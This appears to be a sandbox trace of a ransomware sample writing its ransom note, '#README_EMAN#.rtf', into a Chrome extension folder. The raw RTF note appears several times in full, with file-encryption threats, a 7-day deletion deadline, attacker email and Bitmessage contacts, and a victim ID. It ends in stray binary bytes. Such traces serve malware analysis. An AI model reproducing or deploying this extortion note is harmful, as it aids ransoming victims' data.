CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÞ£ùÞ\x89[¡\x80µP£(£É\x99É\x94\x0fLêì\x9fî3?", lpUsedDefaultChar=0x0) returned 8717 [0283.709] WriteFile (in: hFile=0x2cc, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.722] CloseHandle (hObject=0x2cc) returned 1 [0283.722] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0283.722] GetLastError () returned 0x2 [0283.722] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.725] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 